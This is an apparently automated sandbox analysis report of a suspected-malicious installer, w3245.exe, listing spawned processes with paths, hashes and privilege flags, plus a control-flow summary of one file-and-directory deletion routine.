                                                                                                                                                            Imagebase:0x7c0000
                                                                                                                                                            File size:15'806'278 bytes
                                                                                                                                                            MD5 hash:E92B4D3EE13DA899EA0AD5B54A0094ED
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:low
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:1
                                                                                                                                                            Start time:17:03:58
                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                            Path:C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe" -burn.clean.room="C:\Users\user\Desktop\w3245.exe" -burn.filehandle.attached=540 -burn.filehandle.self=528
                                                                                                                                                            Imagebase:0xa00000
                                                                                                                                                            File size:15'692'672 bytes
                                                                                                                                                            MD5 hash:EC4072E1AE2A9316270E6AFD66235A97
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:low
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:2
                                                                                                                                                            Start time:17:04:00
                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                            Path:C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe
                                                                                                                                                            Imagebase:0xa90000
                                                                                                                                                            File size:6'487'736 bytes
                                                                                                                                                            MD5 hash:11C8962675B6D535C018A63BE0821E4C
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 3%, ReversingLabs
                                                                                                                                                            Reputation:low
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:3
                                                                                                                                                            Start time:17:04:02
                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe
                                                                                                                                                            Imagebase:0x600000
                                                                                                                                                            File size:6'487'736 bytes
                                                                                                                                                            MD5 hash:11C8962675B6D535C018A63BE0821E4C
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 3%, ReversingLabs
                                                                                                                                                            Reputation:low
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:4
                                                                                                                                                            Start time:17:04:03
                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            Imagebase:0x240000
                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:5
                                                                                                                                                            Start time:17:04:03
                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:10
                                                                                                                                                            Start time:17:04:29
                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                            Imagebase:0x7ff72bec0000
                                                                                                                                                            File size:2'364'728 bytes
                                                                                                                                                            MD5 hash:967F4470627F823F4D7981E511C9824F
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                            Reputation:moderate
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:11
                                                                                                                                                            Start time:17:04:39
                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe"
                                                                                                                                                            Imagebase:0x600000
                                                                                                                                                            File size:6'487'736 bytes
                                                                                                                                                            MD5 hash:11C8962675B6D535C018A63BE0821E4C
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:low
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:12
                                                                                                                                                            Start time:17:04:40
                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            Imagebase:0x240000
                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:13
                                                                                                                                                            Start time:17:04:40
                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:14
                                                                                                                                                            Start time:17:04:56
                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"
                                                                                                                                                            Imagebase:0x7ff67dcd0000
                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                            MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:15
                                                                                                                                                            Start time:17:04:57
                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                            Imagebase:0x7ff67dcd0000
                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                            MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:false

                                                                                                                                                            General

                                                                                                                                                            Target ID:16
                                                                                                                                                            Start time:17:04:57
                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1984,i,12396277131636632407,2205267590406277603,262144 /prefetch:3
                                                                                                                                                            Imagebase:0x7ff67dcd0000
                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                            MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:17
                                                                                                                                                            Start time:17:04:58
                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2264 --field-trial-handle=2100,i,8124238674860067162,5806231028758839583,262144 /prefetch:3
                                                                                                                                                            Imagebase:0x7ff67dcd0000
                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                            MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:false

                                                                                                                                                            General

                                                                                                                                                            Target ID:18
                                                                                                                                                            Start time:17:05:01
                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                            Imagebase:0x140000000
                                                                                                                                                            File size:2'364'728 bytes
                                                                                                                                                            MD5 hash:967F4470627F823F4D7981E511C9824F
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:19
                                                                                                                                                            Start time:17:05:01
                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6512 --field-trial-handle=2100,i,8124238674860067162,5806231028758839583,262144 /prefetch:8
                                                                                                                                                            Imagebase:0x7ff67dcd0000
                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                            MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:20
                                                                                                                                                            Start time:17:05:01
                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6748 --field-trial-handle=2100,i,8124238674860067162,5806231028758839583,262144 /prefetch:8
                                                                                                                                                            Imagebase:0x7ff67dcd0000
                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                            MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:23
                                                                                                                                                            Start time:17:05:03
                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7392 --field-trial-handle=2100,i,8124238674860067162,5806231028758839583,262144 /prefetch:8
                                                                                                                                                            Imagebase:0x7ff655090000
                                                                                                                                                            File size:1'255'976 bytes
                                                                                                                                                            MD5 hash:76C58E5BABFE4ACF0308AA646FC0F416
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:24
                                                                                                                                                            Start time:17:05:03
                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7392 --field-trial-handle=2100,i,8124238674860067162,5806231028758839583,262144 /prefetch:8
                                                                                                                                                            Imagebase:0x7ff655090000
                                                                                                                                                            File size:1'255'976 bytes
                                                                                                                                                            MD5 hash:76C58E5BABFE4ACF0308AA646FC0F416
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:26
                                                                                                                                                            Start time:17:05:14
                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
                                                                                                                                                            Imagebase:0x7ff67dcd0000
                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                            MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:27
                                                                                                                                                            Start time:17:05:14
                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=1992,i,12794935825972523689,1062421692314691261,262144 /prefetch:3
                                                                                                                                                            Imagebase:0x7ff67dcd0000
                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                            MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:29
                                                                                                                                                            Start time:17:05:22
                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
                                                                                                                                                            Imagebase:0x7ff67dcd0000
                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                            MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:30
                                                                                                                                                            Start time:17:05:23
                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1984,i,5351310162108678119,10159255576747894809,262144 /prefetch:3
                                                                                                                                                            Imagebase:0x7ff67dcd0000
                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                            MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            General

                                                                                                                                                            Target ID:31
                                                                                                                                                            Start time:17:05:58
                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6644 --field-trial-handle=2100,i,8124238674860067162,5806231028758839583,262144 /prefetch:8
                                                                                                                                                            Imagebase:0x7ff67dcd0000
                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                            MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:false

                                                                                                                                                            Disassembly

                                                                                                                                                            Reset < >

                                                                                                                                                              Executed Functions

                                                                                                                                                              Function 007C3CC4 Relevance: 45.8, APIs: 23, Strings: 3, Instructions: 320fileCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 704 7c3cc4-7c3d51 call 7ef8e0 * 2 GetFileAttributesW 709 7c3d85-7c3d88 704->709 710 7c3d53-7c3d5a GetLastError 704->710 713 7c3d8e-7c3d91 709->713 714 7c40d5 709->714 711 7c3d5c-7c3d5e 710->711 712 7c3d5f-7c3d61 710->712 711->712 715 7c3d6e 712->715 716 7c3d63-7c3d6c 712->716 718 7c3dca-7c3dd1 713->718 719 7c3d93-7c3da6 SetFileAttributesW 713->719 717 7c40da-7c40e3 714->717 715->709 722 7c3d70-7c3d71 715->722 716->715 723 7c40ec-7c40f3 717->723 724 7c40e5-7c40e6 FindClose 717->724 720 7c3de0-7c3de8 718->720 721 7c3dd3-7c3dda 718->721 719->718 725 7c3da8-7c3dae GetLastError 719->725 727 7c3dea-7c3dfe GetTempPathW 720->727 728 7c3e25-7c3e40 call 7c2d58 720->728 721->720 726 7c4058 721->726 729 7c3d76-7c3d80 call 7c3821 722->729 730 7c40f5-7c40fb call 805636 723->730 731 7c4100-7c4112 call 7ee06f 723->731 724->723 732 7c3dbb 725->732 733 7c3db0-7c3db9 725->733 734 7c405e-7c406c RemoveDirectoryW 726->734 727->728 735 7c3e00-7c3e06 GetLastError 727->735 728->723 752 7c3e46-7c3e62 FindFirstFileW 728->752 729->723 730->731 740 7c3dbd 732->740 741 7c3dc2-7c3dc8 732->741 733->732 734->717 742 7c406e-7c4074 GetLastError 734->742 743 7c3e08-7c3e11 735->743 744 7c3e13 735->744 740->741 741->729 748 7c407f-7c4085 742->748 749 7c4076-7c4079 742->749 743->744 750 7c3e1a-7c3e20 744->750 751 7c3e15 744->751 753 7c4087-7c4089 748->753 754 7c40a1-7c40a3 748->754 749->748 750->729 751->750 755 7c3e89-7c3e93 752->755 756 7c3e64-7c3e6a GetLastError 752->756 759 7c408b-7c409d MoveFileExW 753->759 760 7c40a5-7c40ab 753->760 754->717 754->760 757 7c3eba-7c3ee0 call 7c2d58 755->757 758 7c3e95-7c3e9e 755->758 761 7c3e6c-7c3e75 756->761 762 7c3e77 756->762 757->717 778 7c3ee6-7c3ef3 757->778 765 7c3fbd-7c3fcd FindNextFileW 758->765 766 7c3ea4-7c3eab 758->766 759->760 768 7c409f 759->768 769 7c3ffa-7c4004 call 7c3821 760->769 761->762 763 7c3e7e-7c3e7f 762->763 764 7c3e79 762->764 763->755 764->763 773 7c404d-7c4052 GetLastError 765->773 774 7c3fcf-7c3fd5 765->774 766->757 771 7c3ead-7c3eb4 766->771 768->754 769->717 771->757 771->765 775 7c4054-7c4056 773->775 776 7c40b0-7c40b6 GetLastError 773->776 774->755 775->734 781 7c40b8-7c40c1 776->781 782 7c40c3 776->782 779 7c3ef5-7c3ef7 778->779 780 7c3f22-7c3f29 778->780 779->780 787 7c3ef9-7c3f09 call 7c2b0c 779->787 785 7c3f2f-7c3f31 780->785 786 7c3fb7 780->786 781->782 783 7c40ca-7c40d0 782->783 784 7c40c5 782->784 783->769 784->783 788 7c3f4c-7c3f5a DeleteFileW 785->788 789 7c3f33-7c3f46 SetFileAttributesW 785->789 786->765 787->717 798 7c3f0f-7c3f18 call 7c3cc4 787->798 788->786 792 7c3f5c-7c3f5e 788->792 789->788 791 7c3fda-7c3fe0 GetLastError 789->791 794 7c3fed 791->794 795 7c3fe2-7c3feb 791->795 796 7c402b-7c4031 GetLastError 792->796 797 7c3f64-7c3f81 GetTempFileNameW 792->797 800 7c3fef 794->800 801 7c3ff4-7c3ff5 794->801 795->794 804 7c403e 796->804 805 7c4033-7c403c 796->805 802 7c4009-7c400f GetLastError 797->802 803 7c3f87-7c3fa4 MoveFileExW 797->803 806 7c3f1d 798->806 800->801 801->769 807 7c401c 802->807 808 7c4011-7c401a 802->808 809 7c3faf 803->809 810 7c3fa6-7c3fad 803->810 811 7c4045-7c404b 804->811 812 7c4040 804->812 805->804 806->786 813 7c401e 807->813 814 7c4023-7c4029 807->814 808->807 815 7c3fb5 MoveFileExW 809->815 810->815 811->769 812->811 813->814 814->769 815->786
                                                                                                                                                              APIs
                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 007C3D40
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 007C3D53
                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,00000001,00000000,?), ref: 007C3D9E
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 007C3DA8
                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?,?,?,?,00000001,00000000,?), ref: 007C3DF6
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 007C3E00
                                                                                                                                                              • FindFirstFileW.KERNELBASE(?,?,?,*.*,?,?,?,?,00000001,00000000,?), ref: 007C3E53
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 007C3E64
                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00000001,00000000,?), ref: 007C3F3E
                                                                                                                                                              • DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,00000001,00000000,?), ref: 007C3F52
                                                                                                                                                              • GetTempFileNameW.KERNEL32(?,DEL,00000000,?,?,?,?,00000001,00000000,?), ref: 007C3F79
                                                                                                                                                              • MoveFileExW.KERNEL32(?,?,00000001,?,?,?,00000001,00000000,?), ref: 007C3F9C
                                                                                                                                                              • MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000001,00000000,?), ref: 007C3FB5
                                                                                                                                                              • FindNextFileW.KERNELBASE(000000FF,?,?,?,?,?,?,?,00000001,00000000,?), ref: 007C3FC5
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 007C3FDA
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 007C4009
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 007C402B
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 007C404D
                                                                                                                                                              • RemoveDirectoryW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 007C4064
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 007C406E
                                                                                                                                                              • MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000001,00000000,?), ref: 007C4095
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 007C40B0
                                                                                                                                                              • FindClose.KERNEL32(000000FF,?,?,?,00000001,00000000,?), ref: 007C40E6
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFileLast$AttributesFindMove$Temp$CloseDeleteDirectoryFirstNameNextPathRemove
                                                                                                                                                              • String ID: *.*$DEL$dirutil.cpp
                                                                                                                                                              • API String ID: 1544372074-1252831301
                                                                                                                                                              • Opcode ID: 2dd18edb1db330b07bbeeb9665ea7bd8b6f93dd4fda0d4ef3972ba33e1b36e57
                                                                                                                                                              • Instruction ID: e4dd1c109893cf5829074ec2260df6a56d1b652d13cc22d82406d87c78f4b9de
                                                                                                                                                              • Opcode Fuzzy Hash: 2dd18edb1db330b07bbeeb9665ea7bd8b6f93dd4fda0d4ef3972ba33e1b36e57
                                                                                                                                                              • Instruction Fuzzy Hash: 87B1C673D412399BDB315A648C05F9AB775AF40760F0142EDEE09BB190D77A9E90CBE0
                                                                                                                                                              Function 007C5195 Relevance: 38.8, APIs: 5, Strings: 17, Instructions: 315COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
